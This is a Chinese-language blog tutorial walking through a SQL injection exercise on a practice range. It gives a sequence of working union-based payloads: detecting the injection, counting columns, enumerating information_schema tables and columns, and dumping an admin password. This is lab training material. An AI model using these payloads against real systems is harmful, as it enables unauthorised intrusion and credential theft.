当前位置:   article > 正文

SQL注入--靶场练习_sql注入靶场

sql注入靶场

提示:本章提到的靶场需要登录注册

靶场奉上:封神台靶场


前言

这里我们需要用到上篇的一些知识
SQL注入基础教程


提示:打开靶场的传送门,会看到以下界面
在这里插入图片描述

一、判断注入类型

?id=1 and 1=1
  • 1

在这里插入图片描述可以看到,此步正常回显
接着输入:

?id=1 and 1=2
  • 1

在这里插入图片描述
开始出问题了
由此可以判断出是数字型注入

二、判断几列

?id=1 order by 2
  • 1

在这里插入图片描述正常回显

?id=1 order by 3
  • 1

在这里插入图片描述出现异常
说明有2列

判断显示位

这里需要输入一个不存在的id

?id=1000 union select 1,2
  • 1

在这里插入图片描述回显不太明显,我第一眼看的时候都没找到
这里给大家标出来了,可以看出只显示了第二列

查询数据库名

?id=1000 union select 1,database()
  • 1

在这里插入图片描述数据库名为maoshe

查询表名

?id=1000 union select 1,group_concat(table_name) from information_schema.tables where table_schema='maoshe'
  • 1

在这里插入图片描述这里大概可以猜测出在admin表中

查询列名

?id=1000 union select 1,group_concat(column_name) from information_schema.columns where table_schema='maoshe' and table_name='admin'
  • 1

在这里插入图片描述所以三列分别是id, username, password

爆表

?id=1000 union select 1,group_concat(password) from admin
  • 1

在这里插入图片描述这里爆出了2个密码,根据题意,我们应该获取admin的密码

?id=1000 union select 1,group_concat(username) from admin
  • 1

在这里插入图片描述所以是第一个密码–hellohack

拿到靶场上提交
在这里插入图片描述
在这里插入图片描述
Good Job!
注入成功!!!


结语

为了方便大家练习,小编准备下期奉上各大靶场的链接

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/267531?site
推荐阅读
相关标签
  

闽ICP备14008679号